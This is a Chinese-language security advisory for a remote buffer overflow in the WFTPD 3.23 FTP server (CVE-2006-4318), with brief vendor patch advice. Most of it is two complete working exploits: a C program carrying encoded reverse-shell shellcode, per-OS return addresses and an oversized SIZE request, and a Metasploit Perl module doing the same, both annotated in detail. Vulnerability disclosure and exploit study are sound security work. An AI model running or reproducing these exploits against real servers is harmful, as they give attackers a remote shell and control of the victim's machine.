
WFTPD服务器多个远程缓冲区溢出漏洞

发布日期:2006-08-22
更新日期:2006-12-27

受影响系统:
Texas Imperial Software WFTPD 3.23
描述:
BUGTRAQ  ID: 19617
CVE(CAN) ID: CVE-2006-4318

WFTPD是Windows平台下的FTP服务程序。

WFTPD在处理带有超长畸形参数的多个命令请求时存在漏洞,远程攻击者可能利用这些漏洞获取系统的控制或造成拒绝服务。


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

///////////////////////////////////////////////////////////////////////
// WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit ///////
// coded by h07 <h07@interia.pl> /////////////////////////////////////
// tested on XP SP2 polish, 2000 SP4 polish ///////////////////////////
///////////////////////////////////////////////////////////////////////

#include <winsock2.h>
#define BUFF_SIZE 1024
#define PORT 21

//win32 reverse (connect-back) shellcode (metasploit.com)
// The payload is stored encoded: the opening bytes look like a small decoder
// stub, and the 4-byte value 0xb6 0x10 0x92 0x98 on the first line is the XOR
// key it applies -- the same constant main() uses to pre-mask the connect-back
// IP and port before config_shellcode() patches them in.  Because it is kept
// as a C string and measured with sizeof()-1 / strlen() below, the encoded
// bytes must contain no NUL (compare the BadChars list in the Perl module).

char shellcode[] =

"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb6"
"\x10\x92\x98\x83\xeb\xfc\xe2\xf4\x4a\x7a\x79\xd5\x5e\xe9\x6d\x67"
"\x49\x70\x19\xf4\x92\x34\x19\xdd\x8a\x9b\xee\x9d\xce\x11\x7d\x13"
"\xf9\x08\x19\xc7\x96\x11\x79\xd1\x3d\x24\x19\x99\x58\x21\x52\x01"
"\x1a\x94\x52\xec\xb1\xd1\x58\x95\xb7\xd2\x79\x6c\x8d\x44\xb6\xb0"
"\xc3\xf5\x19\xc7\x92\x11\x79\xfe\x3d\x1c\xd9\x13\xe9\x0c\x93\x73"
"\xb5\x3c\x19\x11\xda\x34\x8e\xf9\x75\x21\x49\xfc\x3d\x53\xa2\x13"
"\xf6\x1c\x19\xe8\xaa\xbd\x19\xd8\xbe\x4e\xfa\x16\xf8\x1e\x7e\xc8"
"\x49\xc6\xf4\xcb\xd0\x78\xa1\xaa\xde\x67\xe1\xaa\xe9\x44\x6d\x48"
"\xde\xdb\x7f\x64\x8d\x40\x6d\x4e\xe9\x99\x77\xfe\x37\xfd\x9a\x9a"
"\xe3\x7a\x90\x67\x66\x78\x4b\x91\x43\xbd\xc5\x67\x60\x43\xc1\xcb"
"\xe5\x53\xc1\xdb\xe5\xef\x42\xf0\xb6\x10\x92\x98\xd0\x78\x92\x98"
"\xd0\x43\x1b\x79\x23\x78\x7e\x61\x1c\x70\xc5\x67\x60\x7a\x82\xc9"
"\xe3\xef\x42\xfe\xdc\x74\xf4\xf0\xd5\x7d\xf8\xc8\xef\x39\x5e\x11"
"\x51\x7a\xd6\x11\x54\x21\x52\x6b\x1c\x85\x1b\x65\x48\x52\xbf\x66"
"\xf4\x3c\x1f\xe2\x8e\xbb\x39\x33\xde\x62\x6c\x2b\xa0\xef\xe7\xb0"
"\x49\xc6\xc9\xcf\xe4\x41\xc3\xc9\xdc\x11\xc3\xc9\xe3\x41\x6d\x48"
"\xde\xbd\x4b\x9d\x78\x43\x6d\x4e\xdc\xef\x6d\xaf\x49\xc0\xfa\x7f"
"\xcf\xd6\xeb\x67\xc3\x14\x6d\x4e\x49\x67\x6e\x67\x66\x78\x62\x12"
"\xb2\x4f\xc1\x67\x60\xef\x42\x98";

// Patch the connect-back address into the encoded payload in place.
//   ip   - 4-byte IPv4 address, already XOR-masked by the caller (main)
//   port - 2-byte port, already XOR-masked and in network byte order
// Offsets 184 and 190 are fixed for this particular shellcode[]; there is no
// bounds or length check, so the function is only valid for that payload.
void config_shellcode(unsigned long ip, unsigned short port)
  {
  memcpy(&shellcode[184], &ip, 4);
  memcpy(&shellcode[190], &port, 2);
  }

// Return addresses ("JMP ESI" gadgets) indexed by the <ID> argument.  Each is
// a fixed address that is only valid for the exact OS / service pack / language
// build named in its comment; main() bounds-checks the index to 0..4.
unsigned long target[] =
  {
  0x7d16887b, //JMP ESI (XP SP2 polish)
  0x776f2015, //JMP ESI (2000 SP4 polish)
  0x7cb9e082, //JMP ESI (XP SP2 english)
  0x7848a5f1, //JMP ESI (2000 SP4 english)
  0x7ca96834 //JMP ESI (XP SP2 german)
  };

// Single 1 KiB scratch buffer, reused for FTP responses and for the request.
char buffer[BUFF_SIZE];

// Entry point.  argv: <ID> <opt> <host> <user> <pass> <connectback_IP> <connectback_port>
// Flow: validate ID/opt, patch the connect-back address into the payload, open
// a TCP session to port 21, log in with the supplied credentials, then send a
// single oversized SIZE command.  Note the ordering: the overflow is only
// reached after a successful login, so valid FTP credentials are a precondition.
// On the wire this shows up as a SIZE argument of ~530 bytes, mostly 0x90.
// NOTE(review): no return type (implicit int, pre-C99) and no final return.
main(int argc, char *argv[])
{
int sock, id, opt, r_len;
unsigned long eip;               // return address chosen from target[]
unsigned long connectback_IP;    // XOR-masked, see below
unsigned short connectback_port; // XOR-masked, network byte order
struct hostent *he;
struct sockaddr_in client;
WSADATA wsa;

printf("\n[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit\n");
printf("[*] coded by h07 <h07@interia.pl>\n");

if(argc < 8)
  {
  printf("[*] usage:..\n %s <ID> <opt> <host> <user> <pass> <connectback_IP> <connectback_port>\n\n", argv[0]);
  printf("[*] ID list:\n");
  printf("[>] 0: XP SP2 polish\n");
  printf("[>] 1: 2000 SP4 polish\n");
  printf("[>] 2: XP SP2 english\n");
  printf("[>] 3: 2000 SP4 english\n");
  printf("[>] 4: XP SP2 german\n\n");
  printf("[*] opt - WFTPD option 'restrict to home directory and below'\n");
  printf("[>] 0: disabled\n");
  printf("[>] 1: enabled\n\n");
  printf("[*] sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444\n\n", argv[0]);
  exit(0);
  }

WSAStartup(MAKEWORD(2, 0), &wsa);

id = atoi(argv[1]);
opt = atoi(argv[2]);

// Both indices are range-checked here, so target[id] below is in bounds and
// every switch(opt) arm assigns r_len.
if((id > 4) || (id < 0))
  {
  printf("[-] ID error: unknown target\n");
  exit(-1);
  }
  
if((opt > 1) || (opt < 0))
  {
  printf("[-] opt error: unknown option\n");
  exit(-1);
  }
  
// The IP and port are masked with the same 4-byte / 2-byte constant that
// appears at the start of shellcode[] (0x989210b6), presumably so the
// decoder stub restores them at run time; config_shellcode() writes the
// masked values at fixed offsets.
eip = target[id];
connectback_IP = inet_addr(argv[6]) ^ (ULONG)0x989210b6;
connectback_port = htons(atoi(argv[7])) ^ (USHORT)0x9892;
config_shellcode(connectback_IP, connectback_port);

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); // return value not checked

if((he = gethostbyname(argv[3])) == NULL)
  {
  printf("[-] Unable to resolve\n");
  exit(-1);
  }

client.sin_addr = *((struct in_addr *)he->h_addr);
client.sin_port = htons(PORT);
client.sin_family = AF_INET;

if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
  {
  printf("[-] error: connect()\n");
  exit(-1);
  }

// Server banner; the bytes are discarded and the recv() result is not checked.
recv(sock, buffer, BUFF_SIZE -1, 0);

//USER
// NOTE(review): sprintf() of argv[4]/argv[5] into the fixed 1 KiB buffer is
// unbounded -- an over-long argument overflows this tool's own buffer.
// memset() + recv(BUFF_SIZE-1) keep the response NUL-terminated for printf().
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "USER %s\r\n", argv[4]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, BUFF_SIZE -1, 0);
printf("[*] FTP response: %s", buffer);

//PASS
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "PASS %s\r\n", argv[5]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, BUFF_SIZE -1, 0);
printf("[*] FTP response: %s", buffer);

// 530 = "not logged in"; anything else is treated as success.
if(strstr(buffer, "530") != 0) exit(-1);

//SIZE -- request layout (byte offsets into buffer):
//   [0..4]    "SIZE "
//   [5..6]    "/" followed by a 0x90 left from the memset (opt 0), or "//" (opt 1)
//   [7..]     shellcode, then 0x90 fill from the memset
//   [r_len]   4-byte return address: 531 (opt 0) or 532 (opt 1); the one-byte
//             difference is the extra '/' of the restricted-home-directory case
//   [r_len+4] "\r\n" plus a NUL so strlen() stops there
memset(buffer, 0x90, BUFF_SIZE);
memcpy(buffer, "SIZE ", 5);

switch(opt)
  {
  case 0:
    {
    memcpy(buffer + 5, "/", 1);
    r_len = 531;
    break;
    }
  case 1:
    {
    memcpy(buffer + 5, "//", 2);
    r_len = 532;
    break;
    }
  }

memcpy(buffer + 7, shellcode, sizeof(shellcode) -1);
*((unsigned long*)(&buffer[r_len])) = eip;
memcpy(buffer + (r_len + 4), "\r\n\x00", 3);


// strlen() measures up to the NUL written above, so r_len + 6 bytes are sent.
if(send(sock, buffer, strlen(buffer), 0) != -1)
  printf("[+] sending buffer: ok\n");
  else
  printf("[-] sending buffer: failed\n");
    
printf("[*] press enter to quit\n");
getchar();
}



##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::wftpd_size_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;

# No advanced options for this module.
my $advanced = { };

# Module metadata consumed by Msf::Exploit->new (see new() below).
my $info =
  {
    'Name'    => 'WFTPD Server 3.23 SIZE Command Buffer Overflow',
    'Version' => '$Revision: 1.0 $',
    'Authors' =>
      [ 'Jacopo Cervini <acaro [at] jervus.it>',
        
      ],

    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003' ],
    'Priv'  => 0,

    'AutoOpts'  => { 'EXITFUNC' => 'process' },
    # USER/PASS are required: the SIZE command is only reached after login.
    # FLAG selects the one- or two-byte path prefix used in Exploit(), which
    # matches the <opt> argument of the C proof of concept above.
    'UserOpts'  =>
      {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 21],
        'SSL'   => [0, 'BOOL', 'Use SSL'],
        'USER'  => [1, 'DATA', 'Username', 'test'],
        'PASS'  => [1, 'DATA', 'Password', 'test'],
        'FLAG'  => [1, 'BOOL', 'Set to 1 if your user have a
restrict to home directory flag'],
      },

    # NUL and LF would terminate the SIZE argument / command line.
    'Payload' =>
      {
        'Space'  => 400,
        'BadChars'  => "\x00\x0a",

        
        'Keys'         => ['+ws2ord'],
      },

    'Description'  =>  Pex::Text::Freeform(qq{
      This module exploits the buffer overflow found in the SIZE command
      in WFTPD Server 3.23.  
    Credit to h07 for the discovery of this vulnerability.
}),

    'Refs'  =>
      [
        ['BID', '19617'],
        [ 'CVE', '2006-4318' ],
      ],

    'DefaultTarget' => 0,
    # Each target is [name, return address]; the addresses are fixed per
    # OS / service pack / language build.
    # NOTE(review): the bare "ADVAPI32.dll" lines below are the tails of
    # wrapped "#call esi in ADVAPI32.dll" comments as rendered on this page;
    # as printed they are not valid Perl and belong on the comment line above.
    'Targets' =>
      [

    ['Win2k English SP4', 0x7c2d15e7 ], #call esi in ADVAPI32.dll
    ['Win2k Italian SP4', 0x792615e7 ], #call esi in ADVAPI32.dll
    ['WinXP Pro English SP2', 0x77dd6eda ], #call esi in
ADVAPI32.dll
    ['WinXP Pro Italian SP2', 0x77f46eda ], #call esi in
ADVAPI32.dll
    ['WinXP Pro English SP0', 0x77dd19ae ], #call esi in
ADVAPI32.dll
      ],

    'Keys' => ['wftpd'],

    'DisclosureDate' => 'Aug 21 2006',
  };

# Constructor: hands this module's Info and Advanced tables to the base
# Msf::Exploit constructor along with any remaining arguments.
sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' =>
$advanced}, @_);
    return($self);
}


# Run the module: connect to RHOST:RPORT, log in with USER/PASS, then send one
# SIZE command whose argument is FLAG-dependent prefix + payload + NOP padding
# to 0x20d bytes + the target return address (little-endian).  As in the C
# proof of concept above, this is post-authentication.  Every step bails out
# with a PrintLine and a bare return when the server does not answer.
sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target      = $self->Targets->[$target_idx];
    
        # NOP generator is needed for the MakeNops padding further down.
        if (! $self->InitNops(128)) {
        $self->PrintLine("[*] Failed to initialize the NOP
module.");
        return;
    }

    
    

    my $s = Msf::Socket::Tcp->new
      (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
      );

    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' .
$s->GetError);
        return;
    }
    $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using ret
address at 0x%.8x...", $target->[1]));

    # Banner.
    my $r = $s->RecvLineMulti(20);
    if (! $r) { $self->PrintLine("[*] No response from FTP server");
return; }
    $self->Print($r);

    # Login.  Commands are sent with a bare "\n" (the C version uses "\r\n").
    # The reply code is printed but not checked, so a failed login still
    # proceeds to the SIZE request.
    $s->Send("USER ".$self->GetVar('USER')."\n");
    $r = $s->RecvLineMulti(10);
    if (! $r) { $self->PrintLine("[*] No response from FTP server");
return; }
    $self->Print($r);

    $s->Send("PASS ".$self->GetVar('PASS')."\n");
    $r = $s->RecvLineMulti(10);
    if (! $r) { $self->PrintLine("[*] No response from FTP server");
return; }
    $self->Print($r);

# Path prefix: "/" normally, "//" when the account is restricted to its home
# directory; the extra byte shifts where the return address lands.
# NOTE(review): $a is assigned without `my` -- it only passes `use strict`
# because $a is Perl's special sort variable; a lexical would be the usual choice.
if ($self->GetVar('FLAG') == 0) {

    $a="/";

        }

if ($self->GetVar('FLAG') == 1) {
        
    $a="//";
    }

# prefix + payload, padded with NOPs to 0x20d (525) bytes, then the return
# address.  NOTE(review): a payload longer than 0x20d makes the NOP count
# negative; how MakeNops handles that is not visible in this file.
my $request = $a.$shellcode;
    $request .= $self->MakeNops(0x20d-length($shellcode));
        $request .= pack("V", $target->[1]);


    $s->Send("SIZE $request\r\n");
    $r = $s->RecvLineMulti(10);
    if (! $r) { $self->PrintLine("[*] No response from FTP server");
return; }
    $self->Print($r);

    sleep(2);
    return;
}

建议:
厂商补丁:

Texas Imperial Software
-----------------------
目前厂商已经在最新版本的软件中修复了这个安全问题,请到厂商的主页下载:

http://www.wftpd.com/
